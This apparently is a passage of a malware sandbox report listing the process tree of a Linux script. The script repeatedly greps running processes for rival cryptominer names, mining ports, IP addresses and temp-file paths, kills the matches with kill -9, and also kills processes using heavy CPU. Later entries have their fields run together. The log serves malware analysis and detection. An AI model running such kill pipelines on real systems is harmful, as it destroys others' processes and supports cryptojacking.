- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1893)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1892)
- [2⤵] /bin/grep: grep /tmp/sscks (PID:1891)
- [2⤵] /bin/grep: grep -v grep (PID:1890)
- [2⤵] /bin/ps: ps aux (PID:1889)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1898)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1897)
- [2⤵] /bin/grep: grep -v grep (PID:1896)
- [2⤵] /bin/grep: grep "sleep 60" (PID:1895)
- [2⤵] /bin/ps: ps aux (PID:1894)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1903)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1902)
- [2⤵] /bin/grep: grep -v grep (PID:1901)
- [2⤵] /bin/grep: grep ./crun (PID:1900)
- [2⤵] /bin/ps: ps aux (PID:1899)
  - Process Discovery
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1908)
- [2⤵] /usr/bin/awk: awk "{if(\$3>80.0) print \$2}" (PID:1907)
- [2⤵] /bin/grep: grep -v grep (PID:1906)
- [2⤵] /bin/grep: grep -vw kdevtmpfsi (PID:1905)
- [2⤵] /bin/ps: ps aux (PID:1904)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1913)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1912)
- [2⤵] /bin/grep: grep :3333 (PID:1911)
- [2⤵] /bin/grep: grep -v grep (PID:1910)
- [2⤵] /bin/ps: ps aux (PID:1909)
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1918)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1917)
- [2⤵] /bin/grep: grep :5555 (PID:1916)
- [2⤵] /bin/grep: grep -v grep (PID:1915)
- [2⤵] /bin/ps: ps aux (PID:1914)
  - Process Discovery
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1923)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1922)
- [2⤵] /bin/grep: grep "kworker -c\\" (PID:1921)
- [2⤵] /bin/grep: grep -v grep (PID:1920)
- [2⤵] /bin/ps: ps aux (PID:1919)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1928)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1927)
- [2⤵] /bin/grep: grep log_ (PID:1926)
- [2⤵] /bin/grep: grep -v grep (PID:1925)
- [2⤵] /bin/ps: ps aux (PID:1924)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1933)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1932)
- [2⤵] /bin/grep: grep systemten (PID:1931)
- [2⤵] /bin/grep: grep -v grep (PID:1930)
- [2⤵] /bin/ps: ps aux (PID:1929)
  - Process Discovery
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1938)
  - Attempts to change immutable files
- [3⤵] /usr/local/sbin/kill: kill -9 14 (PID:1939)
- [3⤵] /usr/local/bin/kill: kill -9 14 (PID:1939)
- [3⤵] /usr/sbin/kill: kill -9 14 (PID:1939)
- [3⤵] /usr/bin/kill: kill -9 14 (PID:1939)
- [3⤵] /sbin/kill: kill -9 14 (PID:1939)
- [3⤵] /bin/kill: kill -9 14 (PID:1939)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1937)
- [2⤵] /bin/grep: grep netns (PID:1936)
- [2⤵] /bin/grep: grep -v grep (PID:1935)
- [2⤵] /bin/ps: ps aux (PID:1934)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1944)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1943)
- [2⤵] /bin/grep: grep voltuned (PID:1942)
- [2⤵] /bin/grep: grep -v grep (PID:1941)
- [2⤵] /bin/ps: ps aux (PID:1940)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1949)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1948)
- [2⤵] /bin/grep: grep darwin (PID:1947)
- [2⤵] /bin/grep: grep -v grep (PID:1946)
- [2⤵] /bin/ps: ps aux (PID:1945)
  - Process Discovery
  - Reads runtime system information
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1954)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1953)
- [2⤵] /bin/grep: grep /tmp/dl (PID:1952)
- [2⤵] /bin/grep: grep -v grep (PID:1951)
- [2⤵] /bin/ps: ps aux (PID:1950)
  - Process Discovery
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1959)
  - Attempts to change immutable files
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1958)
- [2⤵] /bin/grep: grep /tmp/ddg (PID:1957)
- [2⤵] /bin/grep: grep -v grep (PID:1956)
- [2⤵] /bin/ps: ps aux (PID:1955)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1964)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1963)
- [2⤵] /bin/grep: grep /tmp/pprt (PID:1962)
- [2⤵] /bin/grep: grep -v grep (PID:1961)
- [2⤵] /bin/ps: ps aux (PID:1960)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1969)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1968)
- [2⤵] /bin/grep: grep /tmp/ppol (PID:1967)
- [2⤵] /bin/grep: grep -v grep (PID:1966)
- [2⤵] /bin/ps: ps aux (PID:1965)
- [2⤵] /usr/bin/xargs: xargs -I "%" kill -9 "%" (PID:1974)
- [2⤵] /usr/bin/awk: awk "{print \$2}" (PID:1973)
- [2⤵] /bin/grep: grep "/tmp/65ccE*" (PID:1972)
-
/bin/grepgrep -v grep2⤵PID:1971
-
/bin/psps aux2⤵
- Process Discovery
PID:1970 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1979
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1978
-
/bin/grepgrep "/tmp/jmx*"2⤵PID:1977
-
/bin/grepgrep -v grep2⤵PID:1976
-
/bin/psps aux2⤵
- Process Discovery
PID:1975 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1984
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1983
-
/bin/grepgrep "/tmp/2Ne80*"2⤵PID:1982
-
/bin/grepgrep -v grep2⤵PID:1981
-
/bin/psps aux2⤵
- Process Discovery
PID:1980 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1989 -
/usr/bin/awkawk "{print \$2}"2⤵PID:1988
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵PID:1987
-
/bin/grepgrep -v grep2⤵PID:1986
-
/bin/psps aux2⤵PID:1985
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1994
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1993
-
/bin/grepgrep 45.76.122.922⤵PID:1992
-
/bin/grepgrep -v grep2⤵PID:1991
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:1990 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:1999
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1998
-
/bin/grepgrep 51.38.191.1782⤵PID:1997
-
/bin/grepgrep -v grep2⤵PID:1996
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1995 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2004
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2003
-
/bin/grepgrep 51.15.56.1612⤵PID:2002
-
/bin/grepgrep -v grep2⤵PID:2001
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2000 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2009
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2008
-
/bin/grepgrep 86s.jpg2⤵PID:2007
-
/bin/grepgrep -v grep2⤵PID:2006
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2005 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2014
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2013
-
/bin/grepgrep aGTSGJJp2⤵PID:2012
-
/bin/grepgrep -v grep2⤵PID:2011
-
/bin/psps aux2⤵PID:2010
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2019 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2018
-
/bin/grepgrep nMrfmnRa2⤵PID:2017
-
/bin/grepgrep -v grep2⤵PID:2016
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2015 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2024
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2023
-
/bin/grepgrep PuNY5tm22⤵PID:2022
-
/bin/grepgrep -v grep2⤵PID:2021
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2020 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2029
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2028
-
/bin/grepgrep I0r8Jyyt2⤵PID:2027
-
/bin/grepgrep -v grep2⤵PID:2026
-
/bin/psps aux2⤵PID:2025
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2034 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2033
-
/bin/grepgrep AgdgACUD2⤵PID:2032
-
/bin/grepgrep -v grep2⤵PID:2031
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
PID:2030 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2039
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2038
-
/bin/grepgrep uiZvwxG82⤵PID:2037
-
/bin/grepgrep -v grep2⤵PID:2036
-
/bin/psps aux2⤵
- Process Discovery
PID:2035 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2044
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2043
-
/bin/grepgrep hahwNEdB2⤵PID:2042
-
/bin/grepgrep -v grep2⤵PID:2041
-
/bin/psps aux2⤵
- Process Discovery
PID:2040 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2049 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2048
-
/bin/grepgrep BtwXn5qH2⤵PID:2047
-
/bin/grepgrep -v grep2⤵PID:2046
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2045 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2054
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2053
-
/bin/grepgrep 3XEzey2T2⤵PID:2052
-
/bin/grepgrep -v grep2⤵PID:2051
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2050 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2059 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2058
-
/bin/grepgrep t2tKrCSZ2⤵PID:2057
-
/bin/grepgrep -v grep2⤵PID:2056
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2055 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2064
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2063
-
/bin/grepgrep HD7fcBgg2⤵PID:2062
-
/bin/grepgrep -v grep2⤵PID:2061
-
/bin/psps aux2⤵
- Process Discovery
PID:2060 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2069
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2068
-
/bin/grepgrep zXcDajSs2⤵PID:2067
-
/bin/grepgrep -v grep2⤵PID:2066
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2065 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2074
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2073
-
/bin/grepgrep 3lmigMo2⤵PID:2072
-
/bin/grepgrep -v grep2⤵PID:2071
-
/bin/psps aux2⤵
- Process Discovery
PID:2070 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2079
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2078
-
/bin/grepgrep AkMK4A22⤵PID:2077
-
/bin/grepgrep -v grep2⤵PID:2076
-
/bin/psps aux2⤵PID:2075
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2084
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2083
-
/bin/grepgrep AJ2AkKe2⤵PID:2082
-
/bin/grepgrep -v grep2⤵PID:2081
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2080 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2089
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2088
-
/bin/grepgrep HiPxCJRS2⤵
- System Network Configuration Discovery
PID:2087 -
/bin/grepgrep -v grep2⤵PID:2086
-
/bin/psps aux2⤵
- Process Discovery
PID:2085 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2094
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2093
-
/bin/grepgrep http_0xCC0302⤵PID:2092
-
/bin/grepgrep -v grep2⤵PID:2091
-
/bin/psps aux2⤵
- Process Discovery
PID:2090 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2099
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2098
-
/bin/grepgrep http_0xCC0312⤵PID:2097
-
/bin/grepgrep -v grep2⤵PID:2096
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2095 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2104
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2103
-
/bin/grepgrep http_0xCC0322⤵PID:2102
-
/bin/grepgrep -v grep2⤵PID:2101
-
/bin/psps aux2⤵
- Process Discovery
PID:2100 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2109
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2108
-
/bin/grepgrep http_0xCC0332⤵PID:2107
-
/bin/grepgrep -v grep2⤵PID:2106
-
/bin/psps aux2⤵PID:2105
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2114
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2113
-
/bin/grepgrep C4iLM4L2⤵PID:2112
-
/bin/grepgrep -v grep2⤵PID:2111
-
/bin/psps aux2⤵
- Process Discovery
PID:2110 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2119 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2118
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2117 -
/bin/grepgrep -v grep2⤵PID:2116
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2115 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2123
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵PID:2122
-
/bin/grepgrep -v grep2⤵PID:2121
-
/bin/psps aux2⤵PID:2120
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2128
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2127
-
/bin/grepgrep /boot/vmlinuz2⤵PID:2126
-
/bin/grepgrep -v grep2⤵PID:2125
-
/bin/psps aux2⤵PID:2124
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2133
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2132
-
/bin/grepgrep i4b503a52cc52⤵PID:2131
-
/bin/grepgrep -v grep2⤵PID:2130
-
/bin/psps aux2⤵PID:2129
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2138 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2137
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵PID:2136
-
/bin/grepgrep -v grep2⤵PID:2135
-
/bin/psps aux2⤵
- Process Discovery
PID:2134 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2143 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2142
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵PID:2141
-
/bin/grepgrep -v grep2⤵PID:2140
-
/bin/psps aux2⤵
- Process Discovery
PID:2139 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2148
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2147
-
/bin/grepgrep nqscheduler2⤵PID:2146
-
/bin/grepgrep -v grep2⤵PID:2145
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2144 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2153
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2152
-
/bin/grepgrep rkebbwgqpl4npmm2⤵PID:2151
-
/bin/grepgrep -v grep2⤵PID:2150
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2149 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2159
-
/usr/local/sbin/killkill -9 15213⤵PID:2160
-
/usr/local/bin/killkill -9 15213⤵PID:2160
-
/usr/sbin/killkill -9 15213⤵PID:2160
-
/usr/bin/killkill -9 15213⤵PID:2160
-
/sbin/killkill -9 15213⤵PID:2160
-
/bin/killkill -9 15213⤵
- Reads CPU attributes
PID:2160 -
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵PID:2158
-
/bin/grepgrep "]"2⤵PID:2157
-
/bin/grepgrep -v aux2⤵PID:2156
-
/bin/grepgrep -v grep2⤵PID:2155
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2154 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2165 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2164
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵PID:2163
-
/bin/grepgrep -v grep2⤵PID:2162
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2161 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2170
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2169
-
/bin/grepgrep 0kwti6ut420t2⤵PID:2168
-
/bin/grepgrep -v grep2⤵PID:2167
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2166 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2175
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2174
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵PID:2173
-
/bin/grepgrep -v grep2⤵PID:2172
-
/bin/psps aux2⤵PID:2171
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2182
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵PID:2181
-
/bin/grepgrep -v _2⤵PID:2180
-
/bin/grepgrep -v -2⤵PID:2179
-
/bin/grepgrep -v /2⤵PID:2178
-
/bin/grepgrep -v grep2⤵PID:2177
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2176 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2187
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2186
-
/bin/grepgrep "\\[^"2⤵PID:2185
-
/bin/grepgrep -v grep2⤵PID:2184
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2183 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2192
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2191
-
/bin/grepgrep rsync2⤵PID:2190
-
/bin/grepgrep -v grep2⤵PID:2189
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2188 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2197 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2196
-
/bin/grepgrep watchd0g2⤵PID:2195
-
/bin/grepgrep -v grep2⤵PID:2194
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2193 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2202 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2201
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵PID:2200
-
/bin/grepgrep -v grep2⤵PID:2199
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2198 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2207
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2206
-
/bin/grepgrep 158.69.133.18:82202⤵PID:2205
-
/bin/grepgrep -v grep2⤵PID:2204
-
/bin/psps aux2⤵
- Process Discovery
PID:2203 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2212
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2211
-
/bin/grepgrep /tmp/java2⤵PID:2210
-
/bin/grepgrep -v grep2⤵PID:2209
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2208 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2217
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2216
-
/bin/grepgrep gitee.com2⤵PID:2215
-
/bin/grepgrep -v grep2⤵PID:2214
-
/bin/psps aux2⤵
- Process Discovery
PID:2213 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2222
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2221
-
/bin/grepgrep /tmp/java2⤵PID:2220
-
/bin/grepgrep -v grep2⤵PID:2219
-
/bin/psps aux2⤵
- Process Discovery
PID:2218 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2227 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2226
-
/bin/grepgrep 104.248.4.1622⤵PID:2225
-
/bin/grepgrep -v grep2⤵PID:2224
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2223 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2232 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2231
-
/bin/grepgrep 89.35.39.782⤵PID:2230
-
/bin/grepgrep -v grep2⤵PID:2229
-
/bin/psps aux2⤵PID:2228
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2237
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2236
-
/bin/grepgrep /dev/shm/z3.sh2⤵PID:2235
-
/bin/grepgrep -v grep2⤵PID:2234
-
/bin/psps aux2⤵PID:2233
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2242
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2241
-
/bin/grepgrep kthrotlds2⤵PID:2240
-
/bin/grepgrep -v grep2⤵PID:2239
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2238 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2247
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2246
-
/bin/grepgrep ksoftirqds2⤵PID:2245
-
/bin/grepgrep -v grep2⤵PID:2244
-
/bin/psps aux2⤵
- Process Discovery
PID:2243 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2252
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2251
-
/bin/grepgrep netdns2⤵PID:2250
-
/bin/grepgrep -v grep2⤵PID:2249
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:2248 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2257
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2256
-
/bin/grepgrep watchdogs2⤵PID:2255
-
/bin/grepgrep -v grep2⤵PID:2254
-
/bin/psps aux2⤵PID:2253
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2269
-
/usr/bin/awkawk "\$3>80.0{print \$2}"2⤵PID:2268
-
/bin/grepgrep -v postgresq12⤵PID:2267
-
/bin/grepgrep -v atd2⤵PID:2265
-
/bin/grepgrep -v kdevtmpfsi2⤵PID:2266
-
/bin/grepgrep -v apache22⤵PID:2264
-
/bin/grepgrep -v dblaunched2⤵PID:2263
-
/bin/grepgrep -v dblaunchs2⤵PID:2262
-
/bin/grepgrep -v dblaunch2⤵PID:2261
-
/bin/grepgrep -v root2⤵PID:2260
-
/bin/grepgrep -v grep2⤵PID:2259
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2258 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2275
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2274
-
/bin/grepgrep " ps"2⤵PID:2273
-
/bin/grepgrep -v aux2⤵PID:2272
-
/bin/grepgrep -v grep2⤵PID:2271
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2270 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2280
-
/usr/bin/cutcut -c 9-152⤵PID:2279
-
/bin/grepgrep sync_supers2⤵PID:2278
-
/bin/grepgrep -v grep2⤵PID:2277
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2276 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2285
-
/usr/bin/cutcut -c 9-152⤵PID:2284
-
/bin/grepgrep cpuset2⤵PID:2283
-
/bin/grepgrep -v grep2⤵PID:2282
-
/bin/psps aux2⤵
- Reads runtime system information
PID:2281 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2291
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2290
-
/bin/grepgrep "x]"2⤵PID:2289
-
/bin/grepgrep -v aux2⤵PID:2288
-
/bin/grepgrep -v grep2⤵PID:2287
-
/bin/psps aux2⤵
- Process Discovery
PID:2286 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2297
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2296
-
/bin/grepgrep "sh] <"2⤵PID:2295
-
/bin/grepgrep -v aux2⤵PID:2294
-
/bin/grepgrep -v grep2⤵PID:2293
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2292 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2303 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2302
-
/bin/grepgrep " \\[]"2⤵PID:2301
-
/bin/grepgrep -v aux2⤵PID:2300
-
/bin/grepgrep -v grep2⤵PID:2299
-
/bin/psps aux2⤵
- Reads CPU attributes
PID:2298 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2308
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2307
-
/bin/grepgrep /tmp/l.sh2⤵PID:2306
-
/bin/grepgrep -v grep2⤵PID:2305
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:2304 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2313
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2312
-
/bin/grepgrep /tmp/zmcat2⤵PID:2311
-
/bin/grepgrep -v grep2⤵PID:2310
-
/bin/psps aux2⤵
- Process Discovery
- Reads runtime system information
PID:2309 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:2318 -
/usr/bin/awkawk "{print \$2}"2⤵PID:2317
-
/bin/grepgrep hahwNEdB2⤵PID:2316
-
/bin/grepgrep -v grep2⤵PID:2315
-
/bin/psps aux2⤵
- Process Discovery
PID:2314 -
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2323
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2322
-
/bin/grepgrep CnzFVPLF2⤵PID:2321
-
/bin/grepgrep -v grep2⤵PID:2320
-
/bin/psps aux2⤵PID:2319
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2328
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2327
-
/bin/grepgrep CvKzzZLs2⤵PID:2326
-
/bin/grepgrep -v grep2⤵PID:2325
-
/bin/psps aux2⤵PID:2324
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2333
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2332
-
/bin/grepgrep aziplcr72qjhzvin2⤵
- System Network Configuration Discovery
PID:2331 -
/bin/grepgrep -v grep2⤵PID:2330
-
/bin/psps aux2⤵PID:2329
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵PID:2338
-
/usr/bin/awkawk "{print \$2}"2⤵PID:2337
-
